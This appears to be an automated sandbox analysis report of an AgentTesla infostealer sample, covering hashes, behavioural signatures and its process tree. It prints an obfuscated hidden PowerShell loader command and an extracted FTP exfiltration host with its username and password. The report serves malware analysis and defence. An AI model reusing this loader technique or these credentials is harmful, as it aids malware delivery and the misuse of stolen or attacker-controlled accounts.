Analysis
-
max time kernel
143s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-10-2024 07:37
Static task
static1
Behavioral task
behavioral1
Sample
ZAMOWIEN.EXE.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ZAMOWIEN.EXE.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Sakset.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Sakset.ps1
Resource
win10v2004-20241007-en
General
-
Target
ZAMOWIEN.EXE.exe
-
Size
443KB
-
MD5
e48da20cb37e235145461d1ef93d560e
-
SHA1
cbea11aeb4c0ce13c251b5f9bf13560882602a9b
-
SHA256
f1a872932afe6964f188d3ddd0f2c2dfa639bfcdfd1baff74bdcd5eca8f815c9
-
SHA512
276d051174944b9fca11e21db397fb462296d870faf11fc41b57335acddf475f641df74f4ffadeeb38a014ee1819ad185ad08f3d16d62aeb73d456332ade56a0
-
SSDEEP
6144:NqC56ALcmpQFbVySc2pMOooOZFC7PPH9OvuGnzH6JOSOs+VrPfh8RBq/q4+96YJ0:KA9WL5c2pE8PHZGT64P5aRIle5FVaFzf
Malware Config
Extracted
Protocol: ftp- Host:
ftp.carbognin.it - Port:
21 - Username:
[email protected] - Password:
59Cif8wZUH#X
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.carbognin.it - Port:
21 - Username:
[email protected] - Password:
59Cif8wZUH#X
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3652 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation ZAMOWIEN.EXE.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 17 1064 msiexec.exe 22 1064 msiexec.exe 24 1064 msiexec.exe 36 1064 msiexec.exe 37 1064 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1064 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3652 powershell.exe 1064 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\o.pri ZAMOWIEN.EXE.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\vampirism\discomposed.ini ZAMOWIEN.EXE.exe File opened for modification C:\Windows\resources\0409\Bitings235\restqfr.sta ZAMOWIEN.EXE.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZAMOWIEN.EXE.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 1064 msiexec.exe 1064 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3652 powershell.exe Token: SeIncreaseQuotaPrivilege 3652 powershell.exe Token: SeSecurityPrivilege 3652 powershell.exe Token: SeTakeOwnershipPrivilege 3652 powershell.exe Token: SeLoadDriverPrivilege 3652 powershell.exe Token: SeSystemProfilePrivilege 3652 powershell.exe Token: SeSystemtimePrivilege 3652 powershell.exe Token: SeProfSingleProcessPrivilege 3652 powershell.exe Token: SeIncBasePriorityPrivilege 3652 powershell.exe Token: SeCreatePagefilePrivilege 3652 powershell.exe Token: SeBackupPrivilege 3652 powershell.exe Token: SeRestorePrivilege 3652 powershell.exe Token: SeShutdownPrivilege 3652 powershell.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeSystemEnvironmentPrivilege 3652 powershell.exe Token: SeRemoteShutdownPrivilege 3652 powershell.exe Token: SeUndockPrivilege 3652 powershell.exe Token: SeManageVolumePrivilege 3652 powershell.exe Token: 33 3652 powershell.exe Token: 34 3652 powershell.exe Token: 35 3652 powershell.exe Token: 36 3652 powershell.exe Token: SeDebugPrivilege 1064 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4756 wrote to memory of 3652 4756 ZAMOWIEN.EXE.exe 86 PID 4756 wrote to memory of 3652 4756 ZAMOWIEN.EXE.exe 86 PID 4756 wrote to memory of 3652 4756 ZAMOWIEN.EXE.exe 86 PID 3652 wrote to memory of 1064 3652 powershell.exe 89 PID 3652 wrote to memory of 1064 3652 powershell.exe 89 PID 3652 wrote to memory of 1064 3652 powershell.exe 89 PID 3652 wrote to memory of 1064 3652 powershell.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\ZAMOWIEN.EXE.exe"C:\Users\Admin\AppData\Local\Temp\ZAMOWIEN.EXE.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Ossarium=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\deciliteren\afstnings\Sakset.Res';$storvasks=$Ossarium.SubString(53865,3);.$storvasks($Ossarium)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
384KB
MD5f7b79f20da870295dcf5c0d90de0cb35
SHA1c4f337acfe38c8fc9a3fcccdb2e81168595a1c31
SHA2561fb8978038edaf50e460ec211ad0faa2277b76be6bae3748f33b5e103b6462ac
SHA512b671238abe89bf7fd4c34c339bd3594d420b90d73fc1aba6131c663217c5acdc15ddfb27969a55e7ad320d63be5854df8b81ddeca5fe79eb6e7134f7e62f1f5b
-
Filesize
52KB
MD587d2841aab88bd011520d4b98298992f
SHA1cbdf74d62edcca1c96f44929c396383a405252f8
SHA256158c5134e2910f62d058a85124b81070ba5953276b7a0354ecb5fcc20db58b95
SHA51298d6af4ebafdd61012e0e8daf6c73526e016783f710bda0a17be859d9e9bf7411e914ff531d93b276f206713d47612a252d5bf27329044f8c7fb1a096311a603